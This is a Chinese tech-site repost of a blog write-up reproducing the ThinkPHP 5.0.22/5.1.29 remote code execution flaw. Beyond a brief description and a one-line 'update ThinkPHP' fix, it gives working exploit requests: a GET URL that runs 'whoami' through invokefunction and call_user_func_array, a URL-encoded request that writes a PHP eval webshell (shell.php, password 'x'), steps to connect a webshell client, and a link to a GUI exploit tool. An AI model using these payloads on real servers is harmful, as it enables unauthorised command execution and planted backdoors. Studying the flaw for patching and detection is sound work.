返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
  • 818
分享到

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现

安全phpweb安全 2023-09-12 15:09:44 818人浏览 安东尼
摘要

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述02 影响范围03 验证方式04 利用方式05 修复方案 01 漏洞描述 ThinkPHP是一个国内轻量级的开发框架

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓

01 漏洞描述


ThinkPHP是一个国内轻量级的开发框架。由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

02 影响范围

0php<=5.0.22
5.1

03 验证方式

GET方式尝试命令执行,具体请求如下:

Http://127.0.0.1:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述


04 利用方式

一、手工利用上传一句话木马

1、URL编码一句话木马内容;
在这里插入图片描述

上传一句话木马;

WEBshell地址:http://127.0.0.1/shell.php
passWord:x

http://127.0.0.1:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%3C%3Fphp%20%40eval%28%24_POST%5B%22x%22%5D%29%3F%3E%27%20%3Eshell.php%20

在这里插入图片描述

使用Webshell连接工具连接一句话木马;
在这里插入图片描述


二、工具利用直接命令执行
利用工具ThinkphpGUI:https://GitHub.com/Lotus6/ThinkphpGUI

在这里插入图片描述
在这里插入图片描述



05 修复方案

建议进行Thinkphp版本更新。

来源地址:https://blog.csdn.net/qq2539879928/article/details/127811537

--结束END--

本文标题: Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现

本文链接: https://www.lsjlt.com/news/404711.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作